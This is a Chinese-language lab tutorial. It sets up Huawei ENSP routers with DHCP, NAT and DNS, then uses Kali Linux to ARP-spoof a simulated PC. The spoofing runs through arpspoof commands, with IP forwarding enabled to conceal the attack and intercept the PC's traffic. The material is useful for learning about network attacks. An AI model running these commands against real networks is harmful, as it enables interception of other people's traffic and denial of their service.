Kali linux与ENSP综合实验(实现ARP攻击和欺骗)
ARP(地址解析协议)简介
ARP(Address Resolution Protocol)是一种基于TCP/IP协议的网络协议,用于根据IP地址获取物理地址。当主机发送信息时,会广播包含目标IP地址的ARP请求到局域网上的所有主机,并接收返回消息以确定目标的物理地址。收到返回消息后,主机将该IP地址和物理地址存入本机的ARP缓存中,并保留一定时间。下次请求时,可以直接查询ARP缓存,以节约资源。地址解析协议建立在网络中各个主机互相信任的基础上,局域网上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性,直接将其记入本机ARP缓存。这就构成了ARP欺骗,攻击者可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机。
ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系,添加或删除静态对应关系等。相关协议还包括RARP(逆地址解析协议)和代理ARP。在IPv6中,NDP(邻居发现协议)用于代替地址解析协议。
ARP病毒攻击是局域网中最常见的一种攻击方式。由于TCP/IP协议存在的一些漏洞,ARP病毒可以利用这些漏洞进行欺骗攻击,严重影响人们的上网和通信安全。当局域网内的计算机遭到ARP攻击时,会持续向局域网内所有的计算机和网络通信设备发送大量的ARP欺骗数据包。如果不及时处理,会导致网络通道阻塞、网络设备负载过重以及通讯质量下降等问题。
在这里,我们使用Kali Linux和华为ENSP进行综合实验,实验比较简单,只对ENSP设备进行配置,不对其他靶机进行试验。ENSP网络拓扑图如下:
<Huawei>system-view
[Huawei]sysname google
[google]int g0/0/0
[google-GigabitEthernet0/0/0]ip address 100.1.1.2 24 //配置接口0/0/0的IP地址
[google]int lo 0
[google-LoopBack0]ip address 8.8.8.8 24 //为环回接口设置IP地址
<Huawei>system-view
[Huawei]sysname GW
[GW]int g0/0/0
[GW-GigabitEthernet0/0/0]ip address 192.168.1.254 24
[GW]int g0/0/1
[GW-GigabitEthernet0/0/1]ip address 100.1.1.1 24 //配置ip
[GW]dhcp enable //开启DHCP
[GW]int g0/0/0
[GW-GigabitEthernet0/0/0]dhcp select interface
[GW-GigabitEthernet0/0/0]dhcp server dns-list 192.168.1.254
ENSP设备配置
首先对ENSP设备进行简单配置:
- 将AR4命名为谷歌服务器(Google server)配置。
- 将AR4命名为网关(GW)配置。
- 为GW开启DHCP服务和DNS。
- PC2获取的IP地址为192.168.1.253。
[GW]acl 2000
[GW-acl-basic-2000]rule permit source 192.168.1.0 0.0.0.255
为设备绑定2000
[GW-acl-basic-2000]int g0/0/1
[GW-GigabitEthernet0/0/1]nat outbound 2000
[GW]dns proxy enable
[GW]ip host google.com 8.8.8.8 //设置域名
配置静态路由
[GW]ip route-static 0.0.0.0 0.0.0.0 g0/0/1 100.1.1.2
//配置一条静态路由,使PC2能够ping通google服务器
PC2对GW进行ping,使用命令arp -a查看MAC列表,可以看到GW的g0/0/0接口的MAC地址。
- 为GW进行ACL配置。
- 此时PC2可以ping通8.8.8.8,并且能够ping通域名google.com。
root@wangzhike :~#apt-get install dsniff ssldump
正常情况下,PC2的MAC表如下:
接下来,我们配置最重要的环节——云设置。我们将桥接到Kali Linux上,使用VMnet1。
Kali Linux的配置。注意:我们为Kali Linux添加一张网卡,桥接到VMnet1中。在进行配置之前,请确保打开Kali Linux并下载相应的包,否则在桥接后无法连接到网络无法进行下载。
root@wangzhike :~#dhclient eth1
- 打开虚拟机的虚拟网络编辑器,修改VMnet1,为Kali Linux添加网卡,并桥接到VMnet1上。桥接后,打开Kali Linux并使用命令获取IP地址。Kali Linux的eth1网卡获取的IP地址为192.168.1.252,MAC地址为00-0c-29-78-04-23。此时,Kali Linux和ENSP可以互通。
root@wangzhike :~#arpspoof -i eth1 -t 192.168.1.253 192.168.1.254
root@wangzhike :~#echo “1” > /proc/sys/net/ipv4/ip_forward
root@wangzhike :~#cat /proc/sys/net/ipv4/ip_forward
1
Kali Linux对PC2进行ARP攻击。对目标主机PC2进行攻击(攻击不要断开)。PC2无法ping通谷歌服务器,断网。使用长ping -t命令可以实现Kali Linux对PC2靶机的欺骗。为避免被怀疑,需要开启转发功能。
Kali Linux对PC2进行ARP欺骗。Kali Linux临时开启转发功能,默认为0,需要修改为1。
此时,PC2进行的长ping连接通了。对比之前正常PC2的MAC表,可以看到在欺骗后,靶机PC2要到谷歌服务器的所有流量都会经过Kali Linux,再从Kali Linux流向谷歌服务器。从而Kali Linux可以截取靶机的信息。
这个实验相对简易,无法使用其他工具对靶机进行图片抓取和密码抓取。主要是为了使用ENSP进行实验。哈哈哈!